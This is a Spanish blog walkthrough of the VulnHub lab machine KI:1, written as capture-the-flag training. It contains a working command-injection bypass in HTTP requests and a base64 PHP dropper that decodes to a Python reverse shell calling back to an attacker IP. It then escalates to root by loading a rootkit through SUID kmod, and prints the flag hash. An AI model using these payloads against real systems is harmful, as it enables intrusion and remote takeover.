Breaking KI:1 Walkthrough | runki injection + kmod exploit

 Wup KI: 1


https://www.vulnhub.com/entry/ki-1,641/


- puertos 80 y 22. En 80 un frontend sin mucha historia excepto que en el index aparece este mensaje


 <!-- T-56818 Link removed due to bug report. Will remove the debug page later - chris -->

 

- gobuster y encontramos debug.php, al acceder


<!-- T-56819 - added file parameter for easier page navigation with linuxki - chris -->


=== runki for Linux version 6.0

!!! runki script must be run as root

!!! currently logged in with UID 33


- Tenemos así que se le pasa el parámeter file, hay que buscar resultados: sabemos que es un sistema runki


https://github.com/HewlettPackard/LinuxKI/releases


y que tiene una archivo vulnerable: kivis.php // https://www.exploit-db.com/exploits/48483


al que se accede por la ruta 


/linuxki/experimental/vis/kivis.php


- probamos la vulnerabilidad pero no funciona, probamos entonces el debug.php


/debug.php?file=?


buscamos el kivis.php, probamos alternativas y con file=kivis sale. Vemos que tiene una protección contra el exploit anterior:


// this should keep those rapscallion hackers out! - chris

function url_filter($url_args){

    $blacklisted_chars = array(

        ';' => '',

        '&' => '',

        '$' => '',

        '(' => '',

        ')' => '',

        ' |' => '',

    );

se trata entonces de lograr un bypass de este control. Resalta el último check ' |' => '', al que le falta la doble |, pues con esto se logra el bypass, es decir, en Burp


GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=15%7C%7Cls%7C%7C 


conseguimos RCE. Ya solo falta meter el reverse shell, que tras varios intentos conseguimos creando un archivo hack.php pasando el contenido en base64


GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=15%7C%7Cecho%20%27PD9waHAgc3lzdGVtKCJweXRob24zIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KChcIjE5Mi4xNjguMi44NlwiLDkwMDgpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIik7Pz4%3D%27%20%7C%7C%20base64%20-d%20%3E%20hack.php%7C%7C HTTP/1.1


GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=15%7C%7Ccat%20hack.php%7C%7C HTTP/1.1


<textarea name='kidetail' cols='190' rows='56'> <?php system("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.2.86\",9008));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'");?> </textarea>


- una vez dentro miramos en el .htpasswd de /var/www/html y nos da la contraseña md5 de chris, jhf y dentro su chris


- no tenemos sudo -l, pero en el directorio home de chris hay un hint y tenemos suid kmod. Esto nos lleva al exploit pinkit


https://github.com/PinkP4nther/Pinkit


- descargamos el github, make, abrimos en otra ventana de nuestra máquina el nc a la escucha y hacemos (insmod es alias de kmod, que es suid con lo que podemos conseguir un shell reverse root)


insmod pinkit.ko host="REV_TCP_LH=127.0.0.1" port="REV_TCP_LP=1339" // cambiar ip y port


─(kali㉿kali)-[~]

└─$ nc -lvnp 9007

Ncat: Version 7.92 ( https://nmap.org/ncat )

Ncat: Listening on :::9007

Ncat: Listening on 0.0.0.0:9007

Ncat: Connection from 192.168.2.108.

Ncat: Connection from 192.168.2.108:49030.

/bin/sh: 0: can't access tty; job control turned off

# id

uid=0(root) gid=0(root) groups=0(root)

# cd /root

# ls

root.txt

snap

# cat root.txt

Congratulations! Feel free to tweet me @cwinfosec for feedback.


ae3e05609da7811c015920151e295612


Comentarios

Publicar un comentario

Entradas populares de este blog

Actualizando a LEDE (Openwrt based) el router Afoundry EW-1200

Imagen
Tenemos aquí un router "chino" que en principio llama la atención por las 6 antenas que trae. Por el precio sería un router de gama media-alta. Aquí viene una review. Me quedo con la aparente potencia del procesador  Mediatek  MT7621   de 2 núcleos a 880 Mhz y la capacidad de emitir wifi simultáneamente en las bandas de 2.4 y 5 Ghz. Incorpora además -  128 MB  DDR3 RAM - 128 Mb SPI flash - 1 USB 3.0 Funciona bastante bien, pero la interfaz web es demasiado austera y deja muchos parámetros ocultos que lo harían más potente. En concreto trae instalado el Openwrt Barrier Breaker 14.07 pero modificado. Para manipularlo abrimos la carcasa y conectamos por el puerto serial que trae, en este caso de solo 3 pines Rx,Gnd,Tx. No trae JTAG. Para conectar usamos de nuevo un cable prolific  Plugable USB to RS-232 DB9  y un  Serial Port Converter  JY-R2T V1.2 RS232. Al ser una conexión de solo tres pines sin VCC (alimentació...
Leer más

vulnhub walkthrough MORTAL KOMBAT: 1: ARP poison routing + dns spoofing, ssrf hash-length attack

 https://www.vulnhub.com/entry/mortal-kombat-1,383/ You'll need to master and chain together multiple vulnerabilities 1. Se nos presenta lo siguiente Curl test page admin area  (works only if localhost) test page testpage: http://192.168.2.24/index.php?url=http://google.com Probamos lfi http://192.168.2.24/index.php?url=http://127.0.0.1/adminArea.php you can only render page from google.com domain 2. Tenemos que spoofear la petición dns de la máquina virtual haciéndole creer que "google.com" es 127.0.0.1 para poder acceder a adminArea.php.  en kali usar ettercap - configurar etc/ettercap/etter.dns google.com A 127.0.0.1 - Arrancar y hacer mitm arp poisoning seleccionando target1 la víctima y target2 el router - Activar dns spoofing 3. Accedemos a adminArea.php con Burp <!-- After the PT @Bytevsbyt3 told me that my page was really unsecure. He told me that he pwn the server via RFI with ?file=http://evil.com/rfi.txt I read about this vulnerability and now i fixed it. N...
Leer más

SIXES: 1: Walkthrough Advanced-Hard Boot2Root machine: Cookie stealing + jpg shell + pwn BOF ret2lib NX ASLR

Imagen
  https://www.vulnhub.com/entry/sixes-1,380/ Advanced-Hard Boot2Root machine intended to be used in a Workshop/CTF beside Shellmates Club. Este es el primer walkthrough de esta máquina en internet. Tiene una serie de movimientos con los que se puede aprender mucho ;) 1.  Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 09:50 CET Nmap scan report for sixes.home (192.168.2.28) Host is up (0.016s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT     STATE SERVICE 21/tcp   open  ftp 22/tcp   open  ssh 80/tcp   open  http Accedemos al ftp lftp 192.168.2.28:~> dir -r--r--r--    1 0        0             233 Oct 03  2019 note.txt lftp 192.168.2.28:/> cat note.txt DONE:   - Develop the web application frontend and backend   - Add a firewall to block malicious tools TODO:   - Hire a Pentester to secure the web applicati...
Leer más